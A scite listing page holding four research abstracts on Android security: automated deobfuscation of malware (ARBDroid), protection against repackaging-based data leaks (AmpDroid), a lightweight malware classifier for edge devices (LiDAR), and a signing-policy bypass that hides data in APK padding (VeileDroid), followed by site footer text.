The smart phone market is continuously increasing and there are more than 6 billion of smart phone users worldwide with the aid of the 5G technology. Among them Android occupies 87% of the market share. Naturally, the widespread Android smartphones has drawn the attention of the attackers who implement and spread malware. Consequently, currently the number of malware targeting Android mobile phones is ever increasing. Therefore, it is a critical task to find and detect malicious behaviors of malware in a timely manner. However, unfortunately, attackers use a variety of obfuscation techniques for malware to evade or delay detection. When an obfuscation technique such as the class encryption is applied to a malicious application, we cannot obtain any information through a static analysis regarding its malicious behaviors. Hence, we need to rely on the manual, dynamic analysis to find concealed malicious behaviors from obfuscated malware. To avoid malware spreading out in larger scale, we need an automated deobfuscation approach that accurately deobfuscates obfuscated malware so that we can reveal hidden malicious behaviors. In this study, we introduce widely-used obfuscation techniques and propose an effective deobfuscation method, named ARBDroid, for automatically deobfuscating the string encryption, class encryption, and API hiding techniques. Our evaluation results clearly demonstrate that our approach can deobfuscate obfuscated applications based on dynamic analysis results.
Sensitive information leakages from applications are a critical issue in the Android ecosystem. Despite the advance of techniques to secure applications such as packing and obfuscation, a lot of applications are still under the threat of repackaging attacks that inject malicious code and redistribute applications. Also, as we are becoming more dependent on mobile technologies, more sensitive information is used on our mobile devices. Hence, it is of great importance to reduce the risk of such sensitive information leaks. In this paper, we first present a threat model that attempts to leak users' sensitive information by using the repackaging attack, named ReMaCi attack. By analyzing the top 8,546 applications downloaded from Google Play Store, we show that 50% of them are really vulnerable to the ReMaCi attack. We, thus, propose a novel, automated static anti-analysis tool, called AmpDroid, for preventing sensitive information leaks. AmpDroid identifies sensitive dataflows and isolates the code that handles the sensitive data from an application. To demonstrate the effectiveness of AmpDroid, we perform the security and performance evaluation of AmpDroid, comparing it with other obfuscation tools.
With the advent of the 5G network, edge devices and mobile and multimedia applications are used a lot; malware appeared to target edge devices. In the fourth quarter of 2020, 43 million pieces of malware targeting mobile devices occurred. Therefore, a lot of researchers studied various methods to quickly protect users from malware. In particular, they studied detecting malware for achieving the high accuracy with deep learning-based classification models on mobile devices. However, such deep learning-based classifiers consume a lot of resources, and mobile devices have limited hardware resources such as RAM and battery. Therefore, such approaches are difficult to be used in the mobile devices in practice. In this work, we study how a deep learning classifier classifies malware and proposed a novel approach to generate a light-weight classifier that can efficiently and effectively detect malware based on the insight that malware exhibits distinctive features as they are programmed to perform malicious actions such as information leaks. Therefore, by analyzing and extracting distinctive features used by a deep learning classifier from malicious dataset, we generate a light-weight rule-based classifier with high accuracy to efficiently detect malware on edge devices called LiDAR. On an edge device, LiDAR detects malware with 94% accuracy (F1-score) and 85.67% and 328.24% lower usages for CPU and RAM, respectively, than a CNN classifier, and showed the classification time 454.37% faster than the classifier.
Anonymous attackers have been targeting the Android ecosystem for performing severe malicious activities. Despite the complement of various vulnerabilities by security researchers, new vulnerabilities are continuously emerging. In this paper, we introduce a new type of vulnerability that can be exploited to hide data in an application file, bypassing the Android's signing policy. Specifically, we exploit padding areas that can be created by using the alignment option when applications are packaged. We present a proof-of-concept implementation for exploiting the vulnerability. Finally, we demonstrate the effectiveness of VeileDroid by using a synthetic application that hides data in the padding area and updates the data without re-signing and updating the application on an Android device.
scite is a Brooklyn-based organization that helps researchers better discover and understand research articles through Smart Citations–citations that display the context of the citation and describe whether the article provides supporting or contrasting evidence. scite is used by students and researchers from around the world and is funded in part by the National Science Foundation and the National Institute on Drug Abuse of the National Institutes of Health.
customersupport@researchsolutions.com
10624 S. Eastern Ave., Ste. A-614
Henderson, NV 89052, USA
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.
Copyright © 2024 scite LLC. All rights reserved.
Made with 💙 for researchers
Part of the Research Solutions Family.